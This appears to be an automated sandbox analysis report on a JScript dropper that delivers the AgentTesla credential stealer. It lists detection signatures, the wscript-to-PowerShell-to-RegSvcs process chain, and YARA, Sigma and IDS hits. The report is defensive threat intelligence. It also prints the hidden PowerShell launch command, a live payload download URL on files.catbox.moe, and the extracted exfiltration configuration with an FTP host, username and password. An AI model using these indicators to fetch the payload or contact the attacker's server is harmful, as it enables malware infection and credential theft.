
Windows Analysis Report
doc00290320092.jse

Overview

General Information

Sample name: doc00290320092.jse
Analysis ID: 1579018
MD5: a46d0818a4f925c210408c2637ee7810
SHA1: dcdee5e4e5f8caef5740d52fd4444a209c341b8f
SHA256: 7fefb7a81a4c7d4a51a9618d9ef69e951604fa3d7b70d9a2728c971591c1af25
Tags: jse user-lowmal3

Detection

AgentTesla, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Found suspicious powershell code related to unpacking or dynamic code loading
JavaScript source code contains functionality to generate code involving a shell, file or stream
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5056 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00290320092.jse" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1212 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • x.exe (PID: 1512 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 915A6F3675442C388110FB11DB36620A)
        • RegSvcs.exe (PID: 5212 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Blogpost URLs: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Malware configuration: {"Exfil Mode": "FTP", "Host": "ftp://ftp.jeepcommerce.rs", "Username": "5n0w@jeepcommerce.rs", "Password": "T4+.KUh4a;%v"}
Source | Rule | Description | Author | Strings
00000006.00000002.2882351625.0000000000400000.00000040.80000000.00040000.00000000.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
00000005.00000002.1727362900.0000000002F40000.00000004.00001000.00020000.00000000.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
Source | Rule | Description | Author | Strings
6.2.RegSvcs.exe.400000.0.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
6.2.RegSvcs.exe.400000.0.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
6.2.RegSvcs.exe.2ed064e.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
6.2.RegSvcs.exe.2ed064e.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
6.2.RegSvcs.exe.2ed064e.2.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

              System Summary

Source: Network Connection | Author: frack113, Florian Roth | Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5056, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49707
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00290320092.jse", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00290320092.jse", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00290320092.jse", ProcessId: 5056, ProcessName: wscript.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Users\user\AppData\Local\Temp\x.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 1512, ParentProcessName: x.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ProcessId: 5212, ProcessName: RegSvcs.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5056, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49707
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00290320092.jse", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00290320092.jse", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00290320092.jse", ProcessId: 5056, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00290320092.jse", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5056, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", ProcessId: 1212, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-20T17:42:29.915016+0100 | 2018856 | 1 | A Network Trojan was detected | 108.181.20.35 | 443 | 192.168.2.8 | 49707 | TCP
2024-12-20T17:42:29.642551+0100 | 2827578 | 1 | A Network Trojan was detected | 192.168.2.8 | 49707 | 108.181.20.35 | 443 | TCP


              AV Detection

Source: C:\Users\user\AppData\Local\Temp\x.exe | Avira: detection malicious, Label: HEUR/AGEN.1321703
Source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.jeepcommerce.rs", "Username": "5n0w@jeepcommerce.rs", "Password": "T4+.KUh4a;%v"}
Source: C:\Users\user\AppData\Local\Temp\x.exe | ReversingLabs: Detection: 35%
Source: doc00290320092.jse | ReversingLabs: Detection: 13%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\x.exe | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: Binary string: _.pdb source: RegSvcs.exe, 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: x.exe, 00000005.00000003.1720722062.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000005.00000003.1721263258.0000000004060000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: x.exe, 00000005.00000003.1720722062.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000005.00000003.1721263258.0000000004060000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,5_2_004339B6
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,5_2_00452492
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00442886
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_004788BD
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,5_2_0045CAFA
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00431A86
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,5_2_0044BD27
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0045DE8F FindFirstFileW,FindClose,5_2_0045DE8F
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_0044BF8B

              Software Vulnerabilities

Source: doc00290320092.jse | Argument value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true']
Source: doc00290320092.jse | Argument value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"']
Source: doc00290320092.jse | Argument value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', '"Scripting.FileSystemObject"']
Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

Source: Network traffic | Suricata IDS: 2827578 - Severity 1 - ETPRO MALWARE Likely Dropper Doc GET to .moe TLD : 192.168.2.8:49707 -> 108.181.20.35:443
Source: Network traffic | Suricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 108.181.20.35:443 -> 192.168.2.8:49707
Source: C:\Windows\System32\wscript.exe | Network Connect: 108.181.20.35 443
Source: Yara match | File source: 6.2.RegSvcs.exe.2ecf766.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.RegSvcs.exe.5930000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.RegSvcs.exe.4155570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS query: name: ip-api.com
Source: global traffic | HTTP traffic detected: GET /gj7umd.ps1 HTTP/1.1 | Accept: */* | Accept-Language: en-ch | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: files.catbox.moe | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_004422FE InternetQueryDataAvailable,InternetReadFile,5_2_004422FE
Source: global traffic | DNS traffic detected: DNS query: files.catbox.moe
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: ftp.jeepcommerce.rs
Source: RegSvcs.exe, 00000006.00000002.2887524458.00000000031AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ftp.jeepcommerce.rs
Source: RegSvcs.exe, 00000006.00000002.2887524458.0000000003151000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: RegSvcs.exe, 00000006.00000002.2887524458.0000000003151000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000003.00000002.1741313249.00000244CBFC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1712669013.00000244BD62C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1712669013.00000244BD4B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1712669013.00000244BB751000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2887524458.0000000003151000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1712669013.00000244BCEA7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000003.00000002.1712669013.00000244BD4B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: RegSvcs.exe, 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 00000003.00000002.1712669013.00000244BB751000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.1712669013.00000244BD62C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1712669013.00000244BD62C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1712669013.00000244BD62C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: wscript.exe, 00000001.00000003.1773041087.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1774814812.000001B50AA80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1772583063.000001B50CC25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1771488602.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://files.catbox.moe
Source: wscript.exe, 00000001.00000003.1773587473.000001B50CDED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://files.catbox.moe/
Source: wscript.exe, 00000001.00000003.1770705424.000001B50C974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1775625595.000001B50CDEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1771185733.000001B50C97B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1769119619.000001B50AADC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1773562345.000001B50AA60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1773041087.000001B50AA6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1684237324.000001B50C97B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1771118890.000001B50AC29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1770705424.000001B50C95F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1771488602.000001B50AA73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1773587473.000001B50CDED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1771488602.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1773587473.000001B50CE0A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1770951506.000001B50C97F000.00000004.00000020.00020000.00000000.sdmp, doc00290320092.jse | String found in binary or memory: https://files.catbox.moe/gj7umd.ps1
Source: wscript.exe, 00000001.00000003.1772155185.000001B50AA47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1773041087.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1774814812.000001B50AA80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1774713133.000001B50AA64000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1773562345.000001B50AA60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1771488602.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://files.catbox.moe/gj7umd.ps1:CreateObject
Source: wscript.exe, 00000001.00000003.1627015912.000001B50C95E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1773818837.000001B50C95E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://files.catbox.moe/gj7umd.ps1u
Source: wscript.exe, 00000001.00000003.1773041087.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1774814812.000001B50AA80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1772583063.000001B50CC25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1771488602.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://files.catbox.moe;
Source: powershell.exe, 00000003.00000002.1712669013.00000244BD4B8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: wscript.exe, 00000001.00000002.1775625595.000001B50CDEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1773587473.000001B50CDED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: powershell.exe, 00000003.00000002.1741313249.00000244CBFC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1712669013.00000244BD62C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.1712669013.00000244BCEA7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000003.00000002.1712669013.00000244BCEA7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.8:49707 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, n00.cs | .Net Code: XmzxwEo1
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_0045A10F
              Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard, | 5_2_0046DC80
              Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput, | 5_2_0044C37A
              Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, | 5_2_0047C81C

              System Summary

              Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.2ed064e.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.2ed064e.2.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
              Source: 5.2.x.exe.2f40000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.5730000.6.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.5730000.6.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.2ecf766.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.2ecf766.1.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
